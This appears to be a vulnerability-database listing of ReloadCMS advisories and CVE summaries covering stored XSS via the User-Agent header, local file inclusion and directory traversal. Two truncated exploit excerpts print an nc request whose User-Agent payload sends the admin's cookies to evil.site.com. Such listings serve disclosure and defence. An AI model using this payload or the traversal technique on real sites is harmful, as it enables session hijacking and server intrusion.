EUVD-2006-1646

Malware in sbrugna...

EUVD-2007-5622

Malware in sbrugna...

ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit

No description provided by source. ?php / ReloadCMS = 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: ReloadCMS is a free CMS written on PHP and based on flat files. vulnerability: ReloadCMS do not properly sanitize User-Agent request...

ReloadCMS 1.2.5 Index.PHP Local File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/26143/info ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to execute local scripts or to view...

ReloadCMS 1.2 Cross Site Scripting

====================================================================== ReloadCMS 1.2. Xss Exploit + view directories and write permissions ====================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'...

Directory traversal

Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the module parameter to index.php...

CVE-2007-5650

Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the module parameter to index.php...

CVE-2007-5650

Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the module parameter to index.php...

CVE-2007-5650

CVE-2007-5650 is a directory traversal vulnerability in ReloadCMS 1.2.7 (system.php). An attacker can cause index.php?module=... to include and execute arbitrary local files by supplying a .. (dot dot) in the module parameter. The affected component is the system.php module of ReloadCMS 1.2.7; th...

reloadcms-lfi.txt

New Advisory: ReloadCMS http://reloadcms.com ——————–Summary—————- Software: ReloadCMS Sowtware’s Web Site: http://reloadcms.com/main/ Versions: 1.2.7 Critical Level: Moderate Type: Multiple Vulnerabilities Class: Remote Status: Unpatched PoC/Exploit: Available Solution: Not Available Discovered b...

ReloadCMS 1.2.5 - index.php Local File Inclusion

ReloadCMS 1.2.5 - index.php Local File Inclusion source: https://www.securityfocus.com/bid/26143/info ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to execute local scripts o...

ReloadCMS Vulnerable

New Advisory: ReloadCMS http://reloadcms.com ——————–Summary—————- Software: ReloadCMS Sowtware’s Web Site: http://reloadcms.com/main/ Versions: 1.2.7 Critical Level: Moderate Type: Multiple Vulnerabilities Class: Remote Status: Unpatched PoC/Exploit: Available Solution: Not Available Discovered b...

ReloadCMS 1.2.5 - &#039;index.php&#039; Local File Inclusion

source: https://www.securityfocus.com/bid/26143/info ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to execute local scripts or to view arbitrary files that may contain...

ReloadCMS-1.2.5.txt

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

Cross site scripting

Cross-site scripting XSS vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP header, which is displayed by...

CVE-2006-1645

Cross-site scripting XSS vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP header, which is displayed by...

CVE-2006-1645

CVE-2006-1645 affects ReloadCMS 1.2.5 and earlier. The vulnerability is a Cross-site Scripting (XSS) issue where an attacker can inject arbitrary script or HTML through the User-Agent header, which is reflected in admin/modules/general/statistic.php in the administration panel. Exploitation is re...

CVE-2006-1645

Cross-site scripting XSS vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP header, which is displayed by...

ReloadCMS &lt;= 1.2.5stable Cross site scripting / remote command execution

?php / ReloadCMS = 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in...

ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...